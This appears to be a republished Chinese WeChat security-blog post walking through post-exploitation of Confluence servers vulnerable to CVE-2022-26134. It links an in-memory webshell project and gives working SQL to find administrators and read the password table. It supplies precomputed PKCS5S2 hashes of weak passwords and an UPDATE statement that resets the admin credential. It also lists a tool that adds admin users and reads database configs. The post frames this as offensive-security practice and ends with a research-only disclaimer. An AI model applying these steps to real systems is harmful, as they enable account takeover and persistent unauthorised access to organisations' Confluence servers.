点击上方蓝字关注我们
1
攻防实战之Confluence后利用
漏洞验证
项目地址:https://github.com/jbaines-r7/through_the_wire
Confluence后利用
打内存马
项目地址:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
连接数据库
查找数据库配置文件
修改admin密码
select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';
可知admin为管理员
查看用户密码表
SELECT * FROM "cwd_user" limit 10
先保存admin密文备用
{PKCS5S2}xcOomVKqqDnMbMMrR3YyE3cP2ihgjkBTbwkfAMz1TaO+Kjxp/p+lcB1CV5sh7pKH
修改密码
修改密码需要改用户id值和已知密文
Id:根据查表admin的id为229377
Credential:
Ab123456对应密文——
{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF
123123对应密文——
{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk
123456对应密文——
{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm
这边将密码改为123123
那么Sql语句为:
update cwd_user set credential = '{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk' where id=xxxxxx;
修改成功:
至此admin的密码被改为了123123
后续
自动化工具
项目地址:https://github.com/BeichenDream/PostConfluence
下载并添加插件
功能模块如下,主要挑选三个介绍:
AddAdminUser 添加一个管理员
EnumAllUser 列举所有用户
EnumHibernateConfig 查看数据库配置文件
END
内部圈子一起内卷
部分大纲展示,详细看
👇👇👇
原文始发于微信公众号(哈拉少安全小队):攻防实战之Confluence后利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论